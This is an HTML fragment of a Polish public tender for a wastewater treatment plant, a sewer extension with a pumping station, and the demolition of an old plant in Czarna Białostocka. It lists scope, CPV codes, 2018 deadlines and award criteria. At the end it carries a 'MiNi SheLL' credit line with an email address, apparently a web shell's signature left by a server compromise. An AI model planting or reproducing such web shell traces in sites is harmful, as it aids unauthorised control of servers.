              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>I
                  
                <b>Nazwa: </b>Zadanie I: Budowa oczyszczalni ścieków <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest wykonanie robót budowlanych w ramach Zadania I: Budowa oczyszczalni ścieków 
Przepustowość oczyszczalni Qdśr.= 2 x 595 m3/d = 1 190 m3/d,
Qd max=2 x 765 m3/d =1 530 m3/d.


W zakresie zadania należy wykonać:
1.	Przed przystąpieniem do robót budowlanych należy wykonać sprawdzające odwierty geotechniczne w miejscach posadowienia:
a)	Reaktorów 3A i 3B  w osi reaktora do 10 m,
b)	Budynku nr 2  punkt przecięcia przekątnych (na rzucie przyziemia)  do 5 m,
c)	Wiaty na osad odwodniony  punkt przecięcia przekątnych (na rzucie przyziemia)  do 5 m,
d)	Budynku administracyjno- magazynowo- warsztatowy  narożniki i punkt przecięcia przekątnych (na rzucie przyziemia)  do 5 m,
e)	Zbiornik osadu nadmiernego  w osi zbiornika do 10 m.
2.	Nowe obiekty kubaturowe:
a)	Budynek techniczny (ob. nr 2),
b)	Budynek administracyjno- magazynowo- garażowy (ob. nr 15),
c)	Stacja Fek-Pak (ob. nr 4),
d)	Wiata na osad odwodniony (ob. nr 14),
e)	Wiata na agregat prądotwórczy (ob. nr 8).
3.	Nowe obiekty technologiczne:
a)	Reaktory biologiczne 2 szt. (ob. nr 3A i 3B),
b)	Pompownia ścieków surowych (ob. nr 1),
c)	Studnia wody technologicznej (ob. nr Swt),
d)	Studnia pomiarowa ścieków oczyszczonych (ob. nr Spo),
e)	Zbiorniki uśredniające ścieków dowożonych (ob. nr 5A i 5B),
f)	Zbiornik osadu nadmiernego (ob. nr 6),
g)	Stacja PIX (ob. nr 16),
h)	Silos wapna (ob. nr 13),
i)	Studnia kraty (ob. nr Sk),
j)	Punkt zrzutu nieczystości z czyszczenia kanalizacji (ob. nr 17 i 18),
k)	Taca najazdowa punktu zlewnego ścieków dowożonych (ob. nr 4A).
4.	Elementy małej infrastruktury:
a)	Schody terenowe,
b)	Skarpy z wzmocnieniem,
c)	Rowy odwadniające.
5.	Infrastrukturę techniczną na terenie oczyszczalni ścieków:
a)	Sieć elektroenergetyczną od złącza kablowo-pomiarowego do Zestawu Tablic Zasilających i do budynku dmuchaw, przyłączy do obiektów technologicznych i sieci oświetleniowej,
b)	Sieć wodociągowa z hydrantami ppoż. i przyłącza wodociągowe do budynków,
c)	Sieć kanalizacji  sanitarnej międzyobiektowe, odprowadzenie ścieków oczyszczonych poprzez studnie pomiarową i projektowany wylot brzegowy do rowu melioracyjnego,
6.	Montaż wyposażenia technologicznego wewnątrz:
a)	Reaktorów biologicznych,
b)	Budynku technicznego,  
c)	Studni kraty, 
d)	Studni wody technologicznej, 
e)	Studni pomiarowej ścieków oczyszczonych, 
f)	Zbiorników uśredniających ścieków dowożonych, 
g)	Zbiornika osadu nadmiernego, 
h)	Budynku administracyjno-magazynowo-warsztatowego, 
i)	Punktu zrzutu nieczystości z czyszczenia kanalizacji.
7.	Prace w zakresie instalacji wod.-kan., wentylacji i ogrzewania oraz instalacji elektrycznych w budynkach i obiektach.
8.	Komunikacja na terenie oczyszczalni i dojścia do obiektów.
9.	Zieleń izolacyjna.
10.	Ogrodzenie działki oczyszczalni.
11.	Rozruch technologiczny, monitoring i wizualizację procesu oczyszczania ścieków.
12.	Instrukcję Współpracy źródła zasilania rezerwowego z siecią elektroenergetyczną i uzgodnić ją z PGE Dystrybucja S.A.
13.	Wyposażyć w sprzęt laboratoryjny i eksploatacyjny.
14.	Zamontować dwie tablice z czytelnym kolorowym schematem technologicznym  (jedna w budynku technicznym - o wym. 700 x 500mm, druga w budynku administracyjno-magazynowo-warsztatowym w formacie A0).
15.	Wykonać instrukcję eksploatacji oczyszczalni ścieków oraz instrukcję obsługi obiektów i konserwacji urządzeń niezbędnych dla prawidłowej eksploatacji oczyszczalni w języku polskim.
16.	Dostarczenie dokumentacji techniczno - ruchowej urządzeń.
17.	Kompletne oznakowanie urządzeń, stref i innych elementów instalacji całej oczyszczalni wymagających oznakowania (nazwa, parametry).
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7, 45100000-8,
                    45200000-9,
                    45231300-8,
                    45232152-2,
                    45233120-6,
                    45252127-4,
                    45252200-0,
                    45310000-3<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena ofertowa</td><td>60</td></tr><tr><td>okres udzielonej gwarancji jakości</td><td>20</td></tr><tr><td>czas reakcji serwisu gwarancyjnego</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>II
                  
                <b>Nazwa: </b>ZADANIE II:Rozbudowa sieci kanalizacji sanitarnej w Czarnej Białostockiej<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Rozbudowa sieci kanalizacji sanitarnej w Czarnej Białostockiej.

W zakresie zadania należy wybudować:
1.	Kanalizację sanitarną grawitacyjną na odcinku od studni S19 (studnia znajduje się na istniejącym kolektorze dopływowym do oczyszczalni ścieków przy ul. Fabrycznej) do projektowanej pompowni ścieków.
Trasa przebiega przez tereny: Gminy Czarna Białostocka, Skarbu Państwa (przejście pod drogą powiatową i pod rowem melioracyjnym), Lasów Państwowych i Polskich Kolei Państwowych (teren zamknięty).
2.	Pompownię ścieków:
a)	Komorę pompowni,
b)	Wyposażenie technologiczne (praca pomp w trybie: jedna, dwie lub trzy),
c)	Zasilanie energetyczne i oświetlenie,
d)	Zagospodarowanie terenu,
e)	Ogrodzenie.
3.	Drogę dojazdową do pompowni.
a)	Droga dojazdowa do pompowni znajduje się na terenie Gminy Czarna Białostocka, Lasów Państwowych i Polskich Kolei Państwowych (teren zamknięty).
4.	Rurociąg tłoczny z projektowanej pompowni ścieków do projektowanej studni rozprężnej znajdującej się na terenie projektowanej oczyszczalni ścieków.
a)	Trasa przebiega przez tereny: Gminy Czarna Białostocka, Polskich Kolei Państwowych (teren zamknięty i teren niezamknięty) i Inwestora.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7, 45232152-2,
                    45310000-3,
                    45231300-8,
                    45100000-8,
                    45200000-9,
                    45233120-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/06/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena ofertowa</td><td>60</td></tr><tr><td>czas reakcji serwisu gwarancyjnego</td><td>30</td></tr><tr><td>okres udzielonej gwarancji jakości</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>III
                  
                <b>Nazwa: </b>ZADANIE III:Likwidacja istniejącej oczyszczalni ścieków.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Likwidacja istniejącej oczyszczalni ścieków. 
	
W zakresie zadania należy wykonać:
1)	Rozbiórkę następujących budynków:
a)	budynek dmuchaw, 
b)	budynek byłej zlewni ścieków,
c)	garaż agregatornia,
d)	sterownia wraz z  budynkiem,
e)	pompownia ścieków wraz z  budynkiem,
f)	budynek kraty. 

2)	Rozbiórkę następujących obiektów:
a)	zbiornik osadu, 
b)	zbiornik Imhoffa, 
c)	zagęszczacz osadu, 
d)	reaktor biologiczny (szt. 2), 
e)	piaskownik, 
f)	poletko osadowe, 
g)	basen ppoż.
3)	Pozostała rozbiórka:
a)	nawierzchnie dróg dojazdowych, placów,
b)	rozbiórką sieci wodociągowej, kanalizacyjnej, c.o.,
c)	unieczynnienie sieci elektroenergetycznej.
4)	Przebudowa wodociągu:
a)	sieć wodociągowa PE 110 L= 93,5 mb.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7, 45110000-1,
                    45231300-8,
                    45100000-8,
                    45310000-3<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena ofertowa</td><td>60</td></tr><tr><td>okes udzielonej gwarancji jakości</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com